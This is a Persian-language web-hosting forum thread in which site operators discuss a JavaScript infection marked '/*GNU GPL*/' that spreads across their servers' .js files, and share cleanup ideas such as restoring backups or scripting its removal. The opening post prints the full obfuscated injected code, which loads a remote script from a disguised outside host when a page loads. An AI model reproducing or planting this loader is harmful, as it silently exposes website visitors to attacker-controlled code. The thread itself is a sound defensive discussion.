ويروس جديد js ولي اين بار جدي تر!

سلام دوستان
چندي پيش اكثر سرويس دهنگان دچار ويروسي شدند كه بعد ها معروف شد به ويروس js كه گوگل سايت رو مخرب ميشناخت و . . . ولي خوب راه حل داشت كه يكسري فايل php و يكسري كد مشخص در برخي فايل ها بود كه ميشد رفعش كرد و راه نفوذش هم از طريف ftp بود.

اينبار ويروس جديدي اومده كه اكثر سرويس دهنگان رو دچار خودش كرده.
دقيق نميدونم اسمش چيه و چي هست ولي در آخر تمام فايل هاي js‌خودش رو كپي ميكنه كه ابتداش هم اين كد هستش
/*GNU GPL*/
پس اون رو با نام GNU GPL ميشناسيم. :-o
الان تمام سايت هاي سرور مادچار اين ويروس شده و بقيش هم داره آلوده ميشه. :66:
اين نمونه كدش هست:

کد:

---

/*GNU GPL*/ try{window.onload = function(){var Cso9f3zbpopes = document.createElement('s^(c!#r##i&)p(#@t#$'.replace(/@|\)|\!|\$|#|&|\^|\(/ig, ''));var Nzol2dvsd2 = 'Ojzdtti6seof7l';Cso9f3zbpopes.setAttribute('type', 't@@!e(&(x!)t^&$&!/)@&&j#^^a#v(!a)^s)c^r&$i)$p)$#t&'.replace(/#|\)|\(|&|\$|\!|\^|@/ig, ''));Cso9f3zbpopes.setAttribute('src',  'h(&!t^#^t!p((^:(!/##^^/#b^$i@(@z$)^r@#^a^!!t&)e@$-#^!c#$#o#^m$)&@.^i#(!@m^p^r!!e)#s@@(s)^!.@&c^#$o)$^.&$(((j@#p)(^@.$@t^$h$e^($p$&(i)&&r#a#t$e$^^)b@!a)y)$-#!&o($^r(&g)#@^.^&s@$i@@t@)!e&)s!#a&&g(@@)e#^s&^(.&&#r^)()u$$:#)(8&0)@8!!0$$)/$$@g)#o(()o@&g&(l^&e@!.^(c#&o!((@@m#$)!/(^g&@o@o#&#^g!&&l$#e&&^!).)^#^c&()o#@m#/^^@h&&##o$!)t^f#)&^i)!l!e^^).&!^!#c!#@^o^($m#()&/)@a)#!u#&t)!^o!$!#.!&@r)&$!u^^$/))t&)^o$$$p!(i#^@x!.)!#c()#@o$m#@/^#!'.replace(/\^|\(|\)|&|\!|#|@|\$/ig, ''));Cso9f3zbpopes.setAttribute('defer', 'd#$(e^^$f!&@e$r&#&'.replace(/#|@|\$|\!|&|\)|\(|\^/ig, ''));Cso9f3zbpopes.setAttribute('id', 'U!(2))#@2@3!!(0@u(g)4!&#v&$2&)^^x)&('.replace(/@|\$|&|\!|#|\)|\^|\(/ig, ''));document.body.appendChild(Cso9f3zbpopes);}} catch(Vm2be34ea8nhd) {}

---

دوستان لطفا يه همفكري بكنيم تا بتونيم مانند سري قبل سريعا مشكل رو حل كنيم.

باتشكر :77:

وا ا ا ا ا ا ی ی ی

اینجا هم ویروس گرفته !!

آنتی ویروس نمیزاره سایت باز بشه !

این که بیشتر از چند ماه هست جدید نیست که !!
یه جایی خوندم متاسفانه به گفته اونها راهی به جز بک آپ نیست و باید همه فایل ها پاک بشن
البته چیزی هست که همونجا خوندم شاید تا الان راه حل درستی پیدا کرده باشن براش

آره.متاسفانه باید تمام فایلها پاک بشه چون هر فایلی رو پاک کنی بازم کپی میزنه.باید فایلها پاک بشه و بک آپ! خوشبختانه خوبیش اینه که دیتابیس رو آلوده نمیکنه و فقط فایلها رو آلوده میکنه..

البته شاید بشه روش کار کرد یه اسکریپتی نوشت که خودش دنبال یه کد خاصی بگرده و فقط اون کد رو پاک کنه (همون متدی که آنتی ویروس ها ازش برای ترمیم فایلها استفاده میکنن)
شما بک آپ نداری ؟

دروغ می گی؟
من قلبم ضعیفه
یکبار گرقتم زندگیم نابود شد :59:

:63::63::63::63::-ss:-ss:-ss:-ss:-ss

این ویروس یکی از مشتری های ما رو پروند. جالبه فایل هاشونو بردن روی یه سرور دیگه و ظاهراً اونجا مشکلی نداره. می گفتن هاستتون ویروسیه!!!!!!!!!!

کل فایل هاتو بده تا برات پاک سازی کنم تحویلت بدم ;)
wordpress یکی اینجوری شده بود پاک سازی کردم دادم تحویلش

کدام آنتی ویروس های اینو میشناسند ؟ کاسپراسکی ؟ آواست ؟

یه نمونه سایت آلوده به این ویروس رو لینک بدید لطفا؟

سایت خودتون هم آلوده شده؟ثبت دامنه | ميزبانی وب | نمايندگی | سرور مجازی | سرور اختصاصی